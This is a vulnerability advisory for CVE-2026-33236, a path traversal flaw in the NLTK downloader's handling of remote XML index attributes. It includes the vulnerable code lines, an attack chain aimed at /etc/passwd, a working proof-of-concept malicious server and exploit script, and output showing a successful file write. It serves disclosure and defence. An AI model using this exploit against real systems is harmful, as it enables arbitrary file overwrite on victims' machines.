PT-2026-26300 · Pypi · Nltk

Published

2026-03-19

·

Updated

2026-03-19

·

CVE-2026-33236

CVSS v3.1

8.1

High

AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Vulnerability Description

The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to:
  1. Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
  2. Arbitrary File Creation: Create arbitrary files
  3. Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd, ~/.ssh/authorized keys, etc.)

Vulnerability Principle

Key Code Locations

1. XML Parsing Without Validation (nltk/downloader.py:253)
self.filename = os.path.join(subdir, id + ext)
  • subdir and id are directly from XML attributes without any validation
2. Path Construction Without Checks (nltk/downloader.py:679)
filepath = os.path.join(download dir, info.filename)
  • Directly uses filename which may contain path traversal
3. Unrestricted Directory Creation (nltk/downloader.py:687)
os.makedirs(os.path.join(download dir, info.subdir), exist ok=True)
  • Can create arbitrary directories outside the download directory
4. File Writing Without Protection (nltk/downloader.py:695)
with open(filepath, "wb") as outfile:
  • Can write to arbitrary locations in the file system

Attack Chain

1. Attacker controls remote XML index server
  ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
  ↓
3. Victim executes: downloader.download('passwd')
  ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
  ↓
5. download package() constructs path: download dir + "../../etc/passwd.zip"
  ↓
6. os.makedirs() creates directory: download dir + "../../etc"
  ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
  ↓
8. System file is overwritten!

Impact Scope

  1. System File Overwrite

Reproduction Steps

Environment Setup

  1. Install NLTK
pip install nltk
  1. Prepare malicious server and exploit script (see PoC section)

Reproduction Process

Step 1: Start malicious server
python3 malicious server.py
Step 2: Run exploit script
python3 exploit vulnerability.py
Step 3: Verify results
ls -la /tmp/test file.zip

Proof of Concept

Malicious Server (malicious server.py)

#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server dir = tempfile.mkdtemp(prefix="nltk malicious ")

# Create malicious XML (contains path traversal)
malicious xml = """<?xml version="1.0"?>
<nltk data>
 <packages>
  <package id="test file" subdir="../../../../../../../../../tmp" 
       url="http://127.0.0.1:8888/test.zip" 
       size="100" unzipped size="100" unzip="0"/>
 </packages>
</nltk data>
"""

# Save files
with open(os.path.join(server dir, "malicious index.xml"), "w") as f:
  f.write(malicious xml)

with zipfile.ZipFile(os.path.join(server dir, "test.zip"), "w") as zf:
  zf.writestr("test.txt", "Path traversal attack!")

# HTTP Handler
class Handler(BaseHTTPRequestHandler):
  def do GET(self):
    if self.path == '/malicious index.xml':
      self.send response(200)
      self.send header('Content-type', 'application/xml')
      self.end headers()
      with open(os.path.join(server dir, 'malicious index.xml'), 'rb') as f:
        self.wfile.write(f.read())
    elif self.path == '/test.zip':
      self.send response(200)
      self.send header('Content-type', 'application/zip')
      self.end headers()
      with open(os.path.join(server dir, 'test.zip'), 'rb') as f:
        self.wfile.write(f.read())
    else:
      self.send response(404)
      self.end headers()
  
  def log message(self, format, *args):
    pass

# Start server
if  name  == " main ":
  port = 8888
  server = HTTPServer(("0.0.0.0", port), Handler)
  print(f"Malicious server started: http://127.0.0.1:{port}/malicious index.xml")
  print("Press Ctrl+C to stop")
  try:
    server.serve forever()
  except KeyboardInterrupt:
    print("
Server stopped")

Exploit Script (exploit vulnerability.py)

#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile

def exploit(server url="http://127.0.0.1:8888/malicious index.xml"):
  download dir = tempfile.mkdtemp(prefix="nltk exploit ")
  print(f"Download directory: {download dir}")
  
  # Exploit vulnerability
  from nltk.downloader import Downloader
  downloader = Downloader(server index url=server url, download dir=download dir)
  downloader.download("test file", quiet=True)
  
  # Check results
  expected path = "/tmp/test file.zip"
  if os.path.exists(expected path):
    print(f"
✗ Exploit successful! File written to: {expected path}")
    print(f"✗ Path traversal attack successful!")
  else:
    print(f"
? File not found, download may have failed")

if  name  == " main ":
  exploit()

Execution Results

✗ Exploit successful! File written to: /tmp/test file.zip
✗ Path traversal attack successful!

Fix

Path traversal

Weakness Enumeration

Related Identifiers

CVE-2026-33236
GHSA-469J-VMHF-R6V7

Affected Products

Nltk